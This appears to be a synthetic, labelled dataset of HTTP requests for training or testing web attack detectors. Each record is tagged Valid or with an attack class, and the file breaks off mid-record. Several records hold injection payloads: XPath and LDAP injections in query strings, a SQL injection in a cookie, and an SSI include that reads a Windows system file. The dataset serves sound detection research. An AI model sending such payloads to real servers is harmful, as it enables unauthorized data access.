Accept: application/postscript;q=0.7, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 60.133.55.180
Cookie: ezrIuh=Iedelete6
Cookie2: $Version="327"
Date: Mon, 24 Mar 08 08:32:07 GMT
ETag: "Z@_jrx68mt-s@PF5"
Expect: d3ttaaTm=shholg;tI4city=eotlhHha
From: iunzwloi@gsattr.biz
If-Modified-Since: Fri, 29 Sep 06 04:51:08 UTC
If-Unmodified-Since: Tue, 24 Aug 04 23:11:03 CET
If-Match: "4OlGMDcCNi69D.iXzENu"
If-None-Match: "1_jDEIcoZGmDk3VxcIRo"
If-Range: Sat, 14 Nov 09 02:34:10 UTC
Max-Forwards: 035
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YXNhaVRrOmxzaGVlY2lo
Range: 1-,-240,665474-
Referer: /Crltt/hiwani/etgmol.nsf
TE: gzip;q=0.1,trailers,deflate;q=0.1
Trailer: If-Modified-Since
User-Agent: n9gSbH http://www.aHspeniv.gov
UA-CPU: x86
UA-Disp: 953,518,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 165x3870
Via: j1qjlj/0.3 www.endc1ed.jpeg, FTP/4.3 204.234.254.56:9, 3.2 www.5eaak.gif:15
Transfer-Encoding: iorcen
Upgrade: tzkoi/0.0, renmir/0.0, tssa/5.2, Rlt8/0.2
Warning: 626 www.nnnan2ha.tiff "aiaet" 
X-Forwarded-For: 250.247.81.83
X-Serial-Number: 7861742222563
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11943
Start - Id: 49515
class: XPathInjection
GET /hSj3m.M@Fx05smh@tc2/ihc7fTAyNoNPRVlM5/tzteaYeiDzEApENjf/lsenr1nAae/aicfheqw/nPW/reehlminn01reefukin/ukp6e/deb/rcHadfF/g54qJ3drop9yPohdimg.exe?rHpgfAihab=eaqy2&R2eworf8ttaRe=0191602&eIncidtriictaid=%24libteh%3Fe%3Cu%2Fadralt%3Bhai&pfz2q=dSWKuYev&0NspyfYB=72htateyr3gry&Treticroeoi=3687643&lS6krowllsrnhe=6-q&4nqooeiehtt=lnagit5%27++or+6+%3C++++count%28path%2Fchild%3A%3A*%29+++or++++%27scon%27++%3D+++%27&mn=dlewn5&X6l6hAyseaNmfti=3&3badIa7plexa=ip+&dnokm=UNnco HTTP/1.0
Host: 227.180.76.32:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: i-ry, 2h0hw-hmb5
Cache-Control: only-if-cached
Client-ip: 106.82.80.243
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="988"
Date: Mon, 13 Nov 06 13:29:17 GMT
ETag: "yazn.m53BeI7lvtipfFN"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Mon, 03 Aug 09 17:33:16 UTC
If-Unmodified-Since: Wed, 17 Mar 10 23:13:04 CET
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: "_b4ZC9NdaVMRsUBjNa"
If-Range: *
Max-Forwards: 22
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest response="9BB6B27FDc09F001de66A19b5ca82987"
Range: -88469
Referer: http://vNAttaz1.de/tdEeenti.sh
TE: gzip;q=0.2,gzip
Trailer: Date
User-Agent: c0mpiItr
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7997x438
Via: i3l/7.4 92.76.229.198, Inx5f/1.2 www.te9N.jpg
Transfer-Encoding: identity
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49515
Start - Id: 24660
class: Valid
GET /sLTzz/et/aZUbBJ0ry/5Xre22KQx.KUKn8I7/aYg/muzR05j_Z2axk6./s0GQWqEpCJsi7/h4VX9@0/aeVd.gif?buhnniReeose=mKZKz&hvwscrt=came%28teanys%28E9htn2o&ls8=euPw18lN.stE&51@ekUpassthruUvE_=hndz&Ssena5iei1epih=eYce-06nVh&alnAwlc5yhu0eko=nU_ahz18aHu&nw3asetas=d8N&r0rocherO=ehscniiecho%3CuEroR8m&jJroRJrf_TF=4890195&rhau=310580&neB=Eoor%27ycrh08eDp&IsrmI9umiN5stdin6=ectr&havingoWjpositioneDWm=opte HTTP/1.0
Host: 190.30.245.87:48272
Connection: close
Accept: text/*;q=0.2, text/plain;q=0.9
Accept-Charset: windows-1253;q=0.7, x-mac-cyrillic;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 252.174.24.134
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="24"
Date: Wed, 11 Jan 06 03:54:37 UTC
ETag: W/"dx7FvNInC693wu7"
Expect: 100-continue
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Thu, 01 Jan 09 08:17:21 CET
If-Unmodified-Since: Tue, 13 Mar 07 18:05:50 CET
If-Match: "0ZTVj@L1cix0LgP"
If-None-Match: *
If-Range: Wed, 29 Aug 07 13:04:17 CET
Max-Forwards: 060
MIME-Version: 0.2
Pragma: uniiracH='EeIad'
Proxy-Authorization: Digest uri=http://www.rCt9s4.com/pv9r/idjlT/Tnd3gss.txt
Authorization: Digest qop=auth
Range: 7216-
Referer: /nmmihobv/EehifsAt/Neeoaei/einoy2h.jpeg
TE: gzip;q=0.0,chunked;q=0.6
Trailer: Expect
User-Agent: Mozilla/9.0 (X11; U; Linux i586 7.3; na-Oh; rv:3.5.5) Gecko/71185293
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.8 www.idismyd.htm:29575, 0.2 44.126.178.13, HTTP/9.8 170.53.162.183
Transfer-Encoding: gzip
Upgrade: gh8d/6.0, ersee/3.2
Warning: 680 www.slre.css:8068 "tgceuha" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 56029803010715
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24660
Start - Id: 37158
class: LdapInjection
GET /i4N6kjUGZR/nas/t6fPpTGXv-/olBcd/7a/hCsYSIwOjstkK_j.php4?ioshw=i6tia0aNfieg&irotu0henaguetz=%29+%28++++%7C+++%28tH%3D7ftl*%29&1trnulo=iead&1rea3n=tE5%40Gs10J&asi0gsceeanhtib=sAprt00m&IC5WM3=+&6trhonefepcu8s=jQPOH&ebhLj5skruttn=73141&Ol2uetnldeuiths=5it%2BnA2roSe&HAm0xOScl=0867067 HTTP/1.0
Host: www.teofymere.biz:5
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, x-mac-roman, big5;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: 1rssiss-iu0n;q=0.3
Cache-Control: only-if-cached
Client-ip: 159.233.41.170
Cookie: ese6jEifofutmev=6997;3kUhb8guVselectx_=flWo.JTAk;qar=17935277;aoIioztclg= 1aan;ndottiafid=nigC7Osu7Q;yfocedile7iaafa=iefwy
Cookie2: $Version="25"
Date: Thu, 10 May 07 12:55:06 GMT
ETag: W/"tPQ1V2111a4tmCmWTe"
Expect: ltdttsO
From: tshrlW@hlaga0aBB1.de
If-Modified-Since: Wed, 27 Dec 06 20:41:04 UTC
If-Unmodified-Since: Sat, 09 Apr 05 04:56:03 CET
If-Match: *
If-None-Match: "vYThNU@fmW8EKJg"
If-Range: "0tws3ITxulaOK84XSM"
Max-Forwards: 2379
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: reekt xebaTim=3oeser
Range: 183458-,10781-99705
Referer: http://www.tjunwrv.org/ppni2nmu/atneO/lktenl6m.conf
TE: trailers
Trailer: Connection
User-Agent: asElmadhjytfr7d93wh
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5776x2501
Via: 3.6 www.uqtmo.gif, 8.0 146.77.9.3
Transfer-Encoding: identity
Upgrade: zlraCa/2.6, muoie/6.9
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 130460
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37158
Start - Id: 1513
class: Valid
GET /.phprxp_13yPDBU4X/s1brs7fwxsie1ej3/eof1eEyhtTo1oan4x/wPlEC8h/a3tncohoui/rLsmK7z21N4vMjM_BpP/ogH7XthEcb./m5iH9kwktll1naohd/oi10t74RPp/eQI.GTB.e45Mu4/M_NNHQ/UA.php3?updateq3D.DX5=99781924&cezishwistb=it&Nmsqian3oc=49&fdbsotsu7=e0Fit2 HTTP/1.1
Host: www.6etrsn4rsM.be
Connection: hdAswnuc
Accept: audio/*, application/postscript;q=0.1
Accept-Charset: euc-kr;q=0.0, x-mac-arabic;q=0.6, iso-8859-6;q=0.4, ks_c_5601-1987;q=0.9
Accept-Encoding: *
Accept-Language: lniaeneq-miMin;q=0.8, jln-dds
Cache-Control: max-stale=3884
Client-ip: 193.52.70.203
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="758"
Date: Sat, 24 Sep 05 05:46:58 UTC
ETag: "U3QRy8ZLQ7XxbVD"
Expect: 100-continue
From: tnuth@Essaahto.uk
If-Modified-Since: Thu, 14 Apr 05 23:05:34 GMT
If-Unmodified-Since: Wed, 28 Sep 05 22:37:48 GMT
If-Match: *
If-None-Match: "cVLJD_2S2TB.Lkf"
If-Range: Tue, 25 Sep 07 20:24:33 CET
Max-Forwards: 9
MIME-Version: 7.1
Pragma: qiarx='E7x8ied'
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: Digest opaque="sisbl"
Range: 460-9787,-3
Referer: http://www.gjagw.biz/eirdo7Td/qogeWc/bo0ts/dDl7dia.sh
TE: deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: eBMWoVb http://www.EamAdeN.st
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: ctA/5.7 63.74.222.43, hbsNn/6.4 www.osYts.tiff:7806
Transfer-Encoding: compress
Upgrade: oona/0.9, wHted/5.5, mcbtI/0.9
Warning: 412 www.hbucErDi.htm "tuhhCealteMaoopehz" 
X-Forwarded-For: 55.173.238.176
X-Serial-Number: 729013897214
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1513
Start - Id: 35574
class: XPathInjection
GET /AvarYWbgsoundKOQ60a/sYLdUUyWvPa.OK/rlisriqrdhn8rtRgv/iXCtTmQv/oinEqtoeqnr4gxD/e4h-.GFwhyZ9AzpC@Y/anmcaihMl/pz-ksh3tTpKBHu/i7Zs5HgG@z/ty7dhbdeba9qhm.jsp?53q0bwma=enagsckn%27+or++++itnto%2Fopwmn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D176%5D+++or++++%273ti%27+%3D+%27&o6lH=iileri02evshoaie20 HTTP/1.1
Host: 64.244.154.38
Connection: close
Accept: image/*, audio/basic
Accept-Charset: koi8-r;q=0.0, macintosh, macintosh, cp-936, hz-gb-2312;q=0.4
Accept-Encoding: deflate, compress, gzip;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 252.234.242.120
Date: Mon, 25 Sep 06 03:28:02 CET
If-Modified-Since: Mon, 23 May 05 22:45:58 GMT
If-Unmodified-Since: Wed, 11 Apr 07 13:44:10 UTC
If-Match: *
If-None-Match: "QJK7npHPtAxHOjB"
Max-Forwards: 01
Pragma: c8oDiio='kertnRet'
Authorization: Basic dXk2aHBudTpveTV4aXJ1eQ==
Referer: /tcou1c/vfen/hchwovt/cesar.jsp
User-Agent: Mozilla/0.1 (X11; U; Open BSD i386 9.4; eD-v4; rv:8.6.6) Gecko/75599979
Via: 7.1 29.228.83.21, FTP/8.2 www.SbhuheOo.css
----: -----------------------------------

null

End - Id: 35574
Start - Id: 30369
class: Valid
GET /iUn6nxAhhO240kEf/tWCm3E1oYyy@x8kDjm/etics/btIeaksdrtttrz/WcnSXJP/eaar9o3i1n/eO2SvNC.fCBHGNbKHRz/aAB6sjGqwYCvKa8b.gif?wte=nCwRWW&7lw6e=%5D+l&lqf=3iIme%2Fp&fa0h7wiemt07plN=2370&j8=5&nSFeval9=iXAs&kei2erluis=5979048 HTTP/1.1
Host: 190.105.18.120
Connection: close
Accept: application/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: saeturb-thbaeha
Cache-Control: max-age=71
Client-ip: 107.92.245.184
Cookie: hnba0uao=inE;E3onHOoo=%n;oGtsaztdrigliz=aueqrokueoeaur;rmO.X=rRrselecthtx@tbm;eelmwtij=a%dahtFeasai9;Aype=UpeuvitGzssne
Cookie2: $Version="36"
Date: Mon, 07 Jul 08 17:10:59 CET
ETag: "3EIAijE5EvtBUf@9"
Expect: 0ygha
From: sfno39@ReecNnett.gov
If-Modified-Since: Mon, 22 Jun 09 06:39:32 UTC
If-Unmodified-Since: Fri, 29 Aug 08 20:21:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8278
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM ZHdvbWdUdGVvbnNuZWhtTW51Z3MxdGRubTZMdG9DcklyVGV0aHNiZ25raGV1cmhj
Authorization: e1eeh o4kheo=rhtqomo
Range: 05745-,56-61
Referer: http://2yetcat.fr/ideNjtye/Bfa35odj/m3aestt/eeian.msf
TE: trailers,gzip,deflate;q=0.9
Trailer: Referer
User-Agent: ttwk34i http://www.sipi0rVd.org
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 704x871
Via: 9.8 www.lot9i.jpg, 2.2 245.20.202.110, FTP/4.4 www.ps5Se7eu.html
Transfer-Encoding: identity
Upgrade: ehv0/7.8, SiHUl/4.9, cp2e3d/9.0
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30369
Start - Id: 30791
class: Valid
GET /aiehp/nanFoa6te2raieoeTwo/eVgX0w0oBGhp-.h4c6I/cwEqhc3ck-R8Wy/qipdi3Sene/A1z-QV8homeD8@/j63TPtRTFyq0pe/c4wTtearteeddNrhChe/wsaefitoietLtts/ex.tqm2FImA5ma/aatmu26iHachetwt/mGGY4C-s9GERb_i45S.php?pnne=tuntlMa&rRjupdatek@ftpupdateA7=hcaaee&LnjFQx=tn%3Eha&ian=q&a0Iuon=%28au%25a&edshsnseTeBi=c%25n&5hRowcieeb=Ejetut0ieb&hb66tttozo=%3Dl3d2p%2F%2FD%284%27+nel&dea6l4y=%2Ftt%26tnph-i&hun1ooeattare=fidao9noeb&hblnrrEqwl1e=e&aAetehusid=860&ohrBsraaysfiedk=106&qS1atl8clxOaSt=slQlXl14HWa&6smlpU9iOehvn=e HTTP/1.1
Host: www.jsrtn.org
Connection: rAeOmRee
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 187.227.5.130
Cookie: gsenittlm=362797;oLPR=0acoa;48gEho3uoe=0teafphtmion;ae1s2emac=439283;i02hes5=787
Cookie2: $Version="55"
Date: Sun, 18 Apr 10 09:46:58 UTC
ETag: "dsNaFYaI9Vqx6VwHcui@"
Expect: rsbooe
From: gEod@e1aR.org
If-Modified-Since: Tue, 30 Mar 04 15:00:36 GMT
If-Unmodified-Since: Wed, 14 Apr 04 17:22:26 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Jun 08 20:26:18 UTC
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: Ecesn kiceNrdE=eaeeecie
Range: 40-,5809-053,-843
Referer: /osRwoe/n8edio/Nnr4e.ace
TE: gzip
Trailer: Range
User-Agent: Mozilla/9.4 (X11; U; Unix 2.3; ec-ot; rv:6.9.9) Gecko/24749175
UA-CPU: 68000
UA-Disp: 5087,659,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5335x466
Via: 3.6 237.64.52.192, thy9L/9.6 www.nRfHji.png
Transfer-Encoding: identity
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 277433290484890410
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30791
Start - Id: 19304
class: Valid
GET /aT9tgpeM/enrhAtoe/sQAS/djaWQp@78cXsoKMLFGpR/6litRaoeeeu6smoso/pedhqoa/ezFku/nnOXzRUtJpP1X0dhU6Ex/Iwesl.png? HTTP/1.0
Host: www.brjf.biz
Connection: mDuta
Accept: video/quicktime;q=0.1, text/*, application/zip;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: aazeN='nrz'
Client-ip: 168.251.210.242
Cookie: VxouSofBzo=hrc;turxNu=3;haBo8n=eoD;ts2otpo=642684
Cookie2: $Version="60"
Date: Fri, 16 Jul 04 09:58:16 CET
ETag: W/"LeVKcrgqvr6zKr57MVb"
Expect: i8bofocm=s9odE
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 14 Aug 07 17:33:13 UTC
If-Unmodified-Since: Mon, 06 Apr 09 04:13:45 GMT
If-Match: *
If-None-Match: "CoVIfrccE.-4cofrIOzt"
If-Range: Fri, 06 Jun 08 14:09:58 CET
Max-Forwards: 659
MIME-Version: 3.8
Pragma: zh='co'
Proxy-Authorization: Basic aW9EbTNpMjp0cnVwZQ==
Authorization: jotl ar9lqmtg=ncIdae
Range: 4-457,-32
Referer: /sPenpy.gif
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.1 (Machintosh; U; PPC 7.3; sc-mr; rv:6.1.2) Gecko/27192159
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 061x5553
Via: 3.0 www.gkef4uv2.shtml, FTP/9.2 99.200.72.88
Transfer-Encoding: nyp9
Upgrade: sahcq/0.1
Warning: 303 143.220.33.216 "entfvdtChoEcrKgtdi8" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19304
Start - Id: 13987
class: Valid
GET /w79vq2oqbHfWfyQL1@w/aCSEVzbG/nHGlIIj_4s3o/teoboeuwcxmt2e/npseetoshkacnjDhn/Sa.bin? HTTP/1.0
Host: 253.187.173.20
Connection: d6urdrgi
Accept: */*;q=0.8
Accept-Charset: windows-1252;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 151.255.182.222
Cookie: le8eiyvp=ttqistdin0systemsuahqp2g;kj4c=eTRqm;qsv0sn=oHs
Cookie2: $Version="0"
Date: Mon, 12 Dec 05 08:05:36 GMT
ETag: "L-TQsQGzGcoyaScA1rs"
Expect: 100-continue
From: s8hvitrs@euHho.st
If-Modified-Since: Sat, 24 Apr 10 03:01:47 GMT
If-Unmodified-Since: Wed, 21 Sep 05 09:58:22 GMT
If-Match: *
If-None-Match: "3XDonp0HhorGn5pvdRL"
If-Range: ".IPKjer5XO2NbZz"
Max-Forwards: 3
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: jjvPD Tebkhb=8eehmla
Authorization: Digest algorithm=MD5
Range: 986633-,-445,64-7061
Referer: http://www.tIjddrvo.net/rrinnpAn/iy5Nhpei/hu3pt/sdlrk.zip
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.7 (compatible; uehamtetn; Solaris; xhxn7; LIhnolh; istwn5t)
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7780x7588
Via: HTTP/9.6 www.qoeyRc.html:579
Transfer-Encoding: gojah
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 751 www.ninm.html "eskobLtz" 
X-Forwarded-For: 94.129.139.140
X-Serial-Number: 738264285065396
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13987
Start - Id: 3226
class: Valid
GET /eTYxu-J/tjtB9DJEIfAQB.php4? HTTP/1.1
Host: 194.173.156.227:025
Connection: tzitL
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: rtmsemEm-igeni;q=0.8, Eg4arva-t;q=0.6, fkio-eoe, rd-t, i-tdenEt6b;q=0.0
Cache-Control: min-fresh=10883
Client-ip: 124.168.253.172
Cookie: drdINojeK=375297
Cookie2: $Version="87"
Date: Fri, 26 May 06 22:48:18 CET
ETag: W/"OeU2kH5vWlQXPSjNQ.Ks"
Expect: zashtu
From: ee5cc9@atzl3njm.com
If-Modified-Since: Fri, 28 Mar 08 24:59:16 GMT
If-Unmodified-Since: Thu, 01 Nov 07 03:28:54 UTC
If-Match: "uZsN@8RT71bFShAS7Pxy"
If-None-Match: "U4_36O4hnFNUpEsDdcO"
If-Range: Wed, 03 Nov 04 04:25:14 CET
Max-Forwards: 44
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Digest realm
Range: 82-228963,737536-47
Referer: http://bme8m.ch/luit/c1eEt6/6sln/np9eos/eydeiE.doc
TE: chunked,trailers,gzip
Trailer: Host
User-Agent: Mozilla/7.5 (compatible; 51peksteeu; Win98; uelmliHt; bTrrecqr)
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x7403
Via: 4.1 93.19.127.104:017, 2.1 www.dsesHpet.js, FTP/8.0 125.177.143.49
Transfer-Encoding: identity
Upgrade: ircioc/5.5, hzedyy/5.6, wArsli/6.7, Euo/8.2
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3226
Start - Id: 8988
class: Valid
GET /kWD2n/ofcwyD2WUI/Srgyenyt1ontbN/aY/hDc2WfXjn/tPBnl/eokmldIclrhasitSt/srjO/isTmPNbzT.jsp?rN=eaarhlUo%5DhupdatetaHna2%3E&0W@2JDf0BY=5&0cnemmn=%3CtsTpa&IWGsystemMPvRE5=uoeaps&rph8w5lirtmue=970381&tehma2ni=rhloheuwgoiHeds&EnesosoehcoeaTe=keexlhstn&epdgEsr=hte%40e&Lt=ee%3A83 HTTP/1.0
Host: 226.76.47.188
Connection: keep-alive
Accept: audio/*, application/*, application/*;q=0.8
Accept-Charset: windows-1254, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=4847
Client-ip: 132.139.140.65
Cookie: i7hestrllc=etaaml
Cookie2: $Version="731"
Date: Fri, 18 Jan 08 21:52:51 UTC
ETag: W/"tITEZe2a@b90OdzSpI@"
Expect: 100-continue
From: lstucdNi@eei2smta.net
If-Modified-Since: Mon, 11 Aug 08 22:53:43 GMT
If-Unmodified-Since: Tue, 13 Jul 04 08:26:05 CET
If-Match: "mXfzT-lDnQqQe5wL2q"
If-None-Match: *
If-Range: "veQY7n8z4mbVYIEphAxY"
Max-Forwards: 23
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bmlyc0FyOGVrdHJvZWF0aXM2Y2VoZTA5ZXJlc3dibjc=
Range: 392737-
Referer: http://tvzs.org/a7Als/tahu9r/6se4c/lSrl/svmlpn2g.msf
TE: trailers
Trailer: Trailer
User-Agent: tsdm8ievhasgemnEiti
UA-CPU: 68000
UA-Disp: 7331,790,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7350x9086
Via: 1.7 www.eettA.jpg
Transfer-Encoding: nVoa; srne=tN8WtoK
Upgrade: ilrn/8.6, ikajsd/4.4
Warning: 247 www.nekn6rAe.htm "a78cpakr" "Tue, 30 Jan 07 10:22:39 CET"
X-Forwarded-For: 253.252.174.31
X-Serial-Number: 92954758156
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8988
Start - Id: 42753
class: SqlInjection
POST /ia1/LEEC/ftXzPfrasK/Rd0atulioDeyn/n5AwfKD.B3ig@Oi/cOEKTN0KS.1Y6wVTjWn/boot.ini_dVCobjectmVC.dll? HTTP/1.0
Content-Length: 177
Content-Language: 35f2de
Content-Encoding: compress
Content-Location: http://dsato.de/oaesR/2Xiuha/eaaDat5.mdb
Content-MD5: QnplbmV5b3JVbXRrSWRzRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Jun 08 22:02:21 UTC
Last-Modified: Sun, 11 Jun 06 21:01:40 CET
Host: 0.117.47.8
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.7
Accept-Language: *
Cache-Control: max-age=03952
Client-ip: 12.141.190.92
Cookie: ee=5;Q.lcgxiframen=i3g;1hmrhhitn4d9=air1etc1z)=atxD<;8c= tbsnjstyleEeiwindow.open;li2syadlteeery=' OR     'njYnoi0i'  BETWEEN 'R'     AND 'T
Cookie2: $Version="62"
Date: Mon, 04 Jul 05 22:44:22 GMT
ETag: W/"tn7EPi_w6_IXb2y9I1B"
Expect: 100-continue
From: tnehuje@osoicnh.gov
If-Modified-Since: Sat, 26 May 07 11:38:39 CET
If-Unmodified-Since: Thu, 24 Mar 05 12:40:25 GMT
If-Match: "EgR4IT072wjrI8HGDSE"
If-None-Match: "oaUxlD087srk8lxp-OQ"
If-Range: *
Max-Forwards: 6835
MIME-Version: 2.3
Pragma: eorshaob=cmcetbsl
Proxy-Authorization: Digest cnonce="xeouomh"
Authorization: Basic bDZxOVdXOm0zNmxyRmU=
Referer: http://hmsrrttp.com/rtat9l/9tacgein/sAhnMeIr/fH1ht.jpeg
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 7.0; ti-lt; rv:8.2.3) Gecko/54937474
UA-CPU: Sparc
UA-Disp: 511,399,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9435x2586
Via: FTP/6.9 236.13.73.17, HTTP/5.2 91.252.12.156:94407
Transfer-Encoding: identity
Upgrade: ot4vpa/8.5
Warning: 200 www.ierlebee.tiff "chcalstx9prp1n0pZc" 
X-Forwarded-For: 65.152.204.230
----: --------------------

rbenS=Iij8sepeOrysmt&ernhssini=cretosh&fe=568021421&yn=Ffp%o&lcnd2rstglc=d@AP&eutsBar5yilU=ithlcirjboot.inistyletelnetdocumentunl&2nedOzortx54aYg=64111&drI=pconnecteDcatot8t

End - Id: 42753
Start - Id: 40512
class: SSI
GET /lJib89v5Q/w_-JD5hTer/-Vb_form193Y/flsmDehznr/Onoo9xtzedheTiosoaMr.dll?xmlkon=2havingemeo7jsrsoS&ret=491038251&.elfMaccess_log3S0a597=%3C%21--%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&Kx8U-8Ws9=3&lort=Al3%7Cei0a4+Gts%3An HTTP/1.0
Host: www.oe4w1.uk:373
Connection: keep-alive
Accept: application/*, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.9, compress
Accept-Language: leh-icneqb;q=0.2, n9cl-tO6st, Bnem-ysyhftb, fnei-ooue4;q=0.9
Cache-Control: max-stale
Client-ip: 197.126.44.202
Cookie: saoa=ee5MaUaL;iegaoats=788788;fbn=dt7e5Ks;3sak6=src'fw=ss0nelwinntt;ae9adibId=8370
Cookie2: $Version="046"
Date: Tue, 14 Apr 09 13:56:55 GMT
ETag: W/"Gmmz1vZc-Pdv.MyYSuu"
Expect: bah0
From: ahew8h@v0rtaRr.ch
If-Modified-Since: Mon, 24 Jul 06 01:31:00 CET
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: *
If-None-Match: *
If-Range: "vXl6oPc_Wpv1p4b"
Max-Forwards: 51
MIME-Version: 4.1
Pragma: z=6edn9Nt
Proxy-Authorization: mmone heot=htan
Authorization: NTLM dHJpZjFla3J3bnJlbnRpZnRybkllZWlTVml0bGlhYWg0c2xzb2lUdA==
Range: 049-19497,328865-,-538
Referer: http://kete.gov/pcvet/0umq/svfa.msf
TE: trailers,gzip;q=0.5,trailers
Trailer: TE
User-Agent: neu8wa
UA-CPU: StrongARM
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 278x2627
